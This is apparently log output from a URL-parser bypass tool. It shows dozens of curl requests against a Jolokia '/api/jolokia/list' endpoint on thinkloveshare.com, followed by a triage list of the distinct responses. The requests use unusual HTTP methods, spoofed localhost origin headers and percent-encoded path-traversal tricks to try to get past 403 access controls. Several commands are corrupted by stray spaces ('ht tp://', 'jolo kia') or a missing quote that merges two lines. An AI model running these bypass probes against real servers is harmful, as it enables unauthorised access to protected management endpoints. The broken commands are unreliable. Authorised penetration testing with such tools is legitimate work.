2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 S afari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: % {size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/ api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'
[...]
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list 2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Curren t: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w ' \nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'ht tp://thinkloveshare.com//api/jolokia//%3b/%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolo kia//%3b%09//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl - sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'
2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit
2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:
9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html
10: 97 - 219145da181c48fea603aab3097d8201.html
10: 99 - 309b8397d07f618ec07541c418979a84.html
10: 100 - 9a1304f66bfee2130b34258635d50171.html
10: 108 - b61052875693afa4b86d39321d4170b4.html
10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html
11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html
12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html
1 6: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html
21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html
22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html
22: 109 - 6d4b61258386f744a388d402a5f11d03.html
22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html
76: 821 - bfe5f92861f949e44b355ee22574194a.html
2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:
echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xa rgs bat